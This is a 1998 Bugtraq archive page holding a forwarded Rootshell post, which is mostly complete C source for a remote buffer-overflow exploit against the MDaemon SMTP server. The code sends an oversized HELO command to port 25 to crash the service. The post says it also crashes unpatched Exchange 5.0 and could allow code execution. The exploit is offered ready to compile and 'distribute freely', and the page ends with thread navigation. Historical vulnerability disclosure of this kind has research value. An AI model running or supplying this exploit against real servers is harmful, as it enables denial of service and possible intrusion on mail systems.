Bugtraq mailing list archives
MDaemon SMTP Server Buffer Overflow's
From: aleph1 () DFW NET (Aleph One)
Date: Wed, 11 Mar 1998 00:44:45 -0600
[ forwarded from rootshell ] Since a similar bug was just released about the MDaemon Config Manager on Bugtraq, we decided to release our MDaemon exploit early. After the exploit you will find the original Bugtraq post. Note that MDaemon has known about this bug since February. Look for our upcoming paper on SMTP server security. /* * MDaemon SMTP server for Windows buffer overflow exploit * * http://www.mdaemon.com - if you dare... * * Tested on MDaemon 2.71 SP1 * * http://www.rootshell.com/ * * Released 3/10/98 * * (C) 1998 Rootshell All Rights Reserved * * For educational use only. Distribute freely. * * Note: This exploit will also crash the Microsoft Exchange 5.0 SMTP mail * connector if SP2 has NOT been installed. * * Danger! * * A malicous user could use this bug to execute arbitrary code on the * remote system. * */ #include <stdio.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #include <string.h> #include <stdlib.h> #include <unistd.h> void main(int argc, char *argv[]) { struct sockaddr_in sin; struct hostent *hp; char *buffer; int sock, i; if (argc != 2) { printf("usage: %s <smtp server>\n", argv[0]); exit(1); } hp = gethostbyname(argv[1]); if (hp==NULL) { printf("Unknown host: %s\n",argv[1]); exit(1); } bzero((char*) &sin, sizeof(sin)); bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length); sin.sin_family = hp->h_addrtype; sin.sin_port = htons(25); sock = socket(AF_INET, SOCK_STREAM, 0); connect(sock,(struct sockaddr *) &sin, sizeof(sin)); buffer = (char *)malloc(10000); sprintf(buffer, "HELO "); for (i = 0; i<4096; i++) strcat(buffer, "x"); strcat(buffer, "\r\n"); write(sock, &buffer[0], strlen(buffer)); close(sock); free(buffer); } -- cut here -- Rootshell Note: The config manager appears to run on port 8081 and is configurable. In the version that we tested (2.71 SP1) this buffer overflow did not exist in the remote config manager, and required a remote version of 3.7 and not 3.0.
Current thread:
- the purpose of dynamic memory allocation D. J. Bernstein (Mar 04)
- Re: the purpose of dynamic memory allocation sinster () DARKWATER COM (Mar 05)
- New OpenBSD security web page Theo de Raadt (Mar 06)
- <Possible follow-ups>
- Re: the purpose of dynamic memory allocation tqbf () secnet com (Mar 06)
- Possible Bug in CDE on HP-UX gareth greenaway (Mar 09)
- Re: Possible Bug in CDE on HP-UX Jeremy Brinkley (Mar 10)
- Re: the purpose of dynamic memory allocation David LeBlanc (Mar 10)
- Re: the purpose of dynamic memory allocation Jeffrey Hutzelman (Mar 10)
- Re: the purpose of dynamic memory allocation Alan Cox (Mar 11)
- DoS (and possibly more) on MDaemon for NT/95 Alvaro Martinez Echevarria (Mar 10)
- MDaemon SMTP Server Buffer Overflow's Aleph One (Mar 10)
- Security problem in Slackware. Suman_Saraf (Mar 11)
- Re: Security problem in Slackware. Peter van Dijk (Mar 13)
- /tmp event logger Michal Zalewski (Mar 14)
- Re: /tmp event logger Theo de Raadt (Mar 15)
- Possible Bug in CDE on HP-UX gareth greenaway (Mar 09)
- Vunerable shell scripts Michal Zalewski (Mar 14)
- More broadcast fun T. Freak (Mar 14)
- Midnight Commander /tmp race Michal Zalewski (Mar 15)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 17)
- Re: Midnight Commander /tmp race willy () SNOWYOWL CSU AC RU (Mar 17)
- Re: Midnight Commander /tmp race Pavel Kankovsky (Mar 18)